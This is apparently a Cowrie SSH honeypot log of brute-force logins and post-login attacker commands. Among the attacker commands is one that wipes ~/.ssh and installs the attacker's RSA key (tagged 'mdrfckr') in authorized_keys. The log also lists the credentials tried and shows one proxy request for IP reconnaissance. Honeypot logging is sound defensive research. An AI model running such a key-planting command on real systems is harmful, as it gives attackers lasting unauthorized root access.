{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T08:04:55.858335Z","src_ip":"212.227.235.229","session":"c1c96dc4a09a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:04:55.859586Z","src_ip":"212.227.235.229","session":"c1c96dc4a09a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40862,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1515d8eac09","protocol":"ssh","message":"New connection: 212.227.235.229:40862 (1.2.3.4:22) [session: b1515d8eac09]","sensor":"my-vps","timestamp":"2025-09-09T08:04:55.941528Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:04:55.942594Z","src_ip":"212.227.235.229","session":"b1515d8eac09"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:04:56.026517Z","src_ip":"212.227.235.229","session":"b1515d8eac09"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T08:04:56.402074Z","src_ip":"212.227.235.229","session":"b1515d8eac09"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:04:57.487788Z","src_ip":"212.227.235.229","session":"b1515d8eac09"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40868,"dst_ip":"1.2.3.4","dst_port":22,"session":"4dfbc953581e","protocol":"ssh","message":"New connection: 212.227.235.229:40868 (1.2.3.4:22) [session: 4dfbc953581e]","sensor":"my-vps","timestamp":"2025-09-09T08:04:57.572357Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:04:57.583628Z","src_ip":"212.227.235.229","session":"4dfbc953581e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:04:57.667750Z","src_ip":"212.227.235.229","session":"4dfbc953581e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:04:58.005525Z","src_ip":"212.227.235.229","session":"4dfbc953581e"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:04:58.092332Z","src_ip":"212.227.235.229","session":"c1c96dc4a09a"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:04:58.093173Z","src_ip":"212.227.235.229","session":"4dfbc953581e"}
{"eventid":"cowrie.login.failed","username":"support","password":"admin","message":"login attempt [support/admin] failed","sensor":"my-vps","timestamp":"2025-09-09T08:04:59.517199Z","src_ip":"212.227.125.160","session":"e80dbdda2822"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:05:00.893667Z","src_ip":"212.227.125.160","session":"e80dbdda2822"}
{"eventid":"cowrie.session.connect","src_ip":"66.240.236.116","src_port":46914,"dst_ip":"1.2.3.4","dst_port":22,"session":"23e3368c17f7","protocol":"ssh","message":"New connection: 66.240.236.116:46914 (1.2.3.4:22) [session: 23e3368c17f7]","sensor":"my-vps","timestamp":"2025-09-09T08:05:39.153774Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T08:05:39.154739Z","src_ip":"66.240.236.116","session":"23e3368c17f7"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-09T08:05:39.319050Z","src_ip":"66.240.236.116","session":"23e3368c17f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45006,"dst_ip":"1.2.3.4","dst_port":22,"session":"40bcc8294c51","protocol":"ssh","message":"New connection: 212.227.125.160:45006 (1.2.3.4:22) [session: 40bcc8294c51]","sensor":"my-vps","timestamp":"2025-09-09T08:05:47.132198Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-09-09T08:05:47.133340Z","src_ip":"212.227.125.160","session":"40bcc8294c51"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-09-09T08:05:47.441527Z","src_ip":"212.227.125.160","session":"40bcc8294c51"}
{"eventid":"cowrie.login.success","username":"root","password":"ipscan","message":"login attempt [root/ipscan] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:05:48.909187Z","src_ip":"212.227.125.160","session":"40bcc8294c51"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:05:49.155050Z","src_ip":"66.240.236.116","session":"23e3368c17f7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-09-09T08:05:49.898930Z","session":"40bcc8294c51"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-09T08:05:50.875299Z","src_ip":"212.227.125.160","session":"40bcc8294c51"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:05:51.183871Z","src_ip":"212.227.125.160","session":"40bcc8294c51"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51830,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0d0f022d51f","protocol":"ssh","message":"New connection: 212.227.235.229:51830 (1.2.3.4:22) [session: d0d0f022d51f]","sensor":"my-vps","timestamp":"2025-09-09T08:06:04.873347Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:06:04.874255Z","src_ip":"212.227.235.229","session":"d0d0f022d51f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:06:04.958888Z","src_ip":"212.227.235.229","session":"d0d0f022d51f"}
{"eventid":"cowrie.login.success","username":"root","password":"Microsoft1","message":"login attempt [root/Microsoft1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:06:05.341188Z","src_ip":"212.227.235.229","session":"d0d0f022d51f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:06:05.531796Z","src_ip":"212.227.235.229","session":"d0d0f022d51f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T08:06:05.532627Z","src_ip":"212.227.235.229","session":"d0d0f022d51f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T08:06:05.533532Z","src_ip":"212.227.235.229","session":"d0d0f022d51f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:06:05.619422Z","src_ip":"212.227.235.229","session":"d0d0f022d51f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:06:05.890849Z","src_ip":"212.227.235.229","session":"d0d0f022d51f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T08:06:05.891673Z","src_ip":"212.227.235.229","session":"d0d0f022d51f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T08:06:05.985548Z","src_ip":"212.227.235.229","session":"d0d0f022d51f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:06:05.986504Z","src_ip":"212.227.235.229","session":"d0d0f022d51f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51832,"dst_ip":"1.2.3.4","dst_port":22,"session":"941359bee90b","protocol":"ssh","message":"New connection: 212.227.235.229:51832 (1.2.3.4:22) [session: 941359bee90b]","sensor":"my-vps","timestamp":"2025-09-09T08:06:06.068675Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:06:06.069519Z","src_ip":"212.227.235.229","session":"941359bee90b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:06:06.153512Z","src_ip":"212.227.235.229","session":"941359bee90b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T08:06:06.535109Z","src_ip":"212.227.235.229","session":"941359bee90b"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:06:07.621981Z","src_ip":"212.227.235.229","session":"941359bee90b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51862,"dst_ip":"1.2.3.4","dst_port":22,"session":"02168e4e3046","protocol":"ssh","message":"New connection: 212.227.235.229:51862 (1.2.3.4:22) [session: 02168e4e3046]","sensor":"my-vps","timestamp":"2025-09-09T08:06:07.705716Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:06:07.706718Z","src_ip":"212.227.235.229","session":"02168e4e3046"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:06:07.791373Z","src_ip":"212.227.235.229","session":"02168e4e3046"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:06:08.173746Z","src_ip":"212.227.235.229","session":"02168e4e3046"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:06:08.260587Z","src_ip":"212.227.235.229","session":"d0d0f022d51f"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:06:08.261535Z","src_ip":"212.227.235.229","session":"02168e4e3046"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39360,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab4db043e176","protocol":"ssh","message":"New connection: 212.227.235.229:39360 (1.2.3.4:22) [session: ab4db043e176]","sensor":"my-vps","timestamp":"2025-09-09T08:07:12.843176Z"}
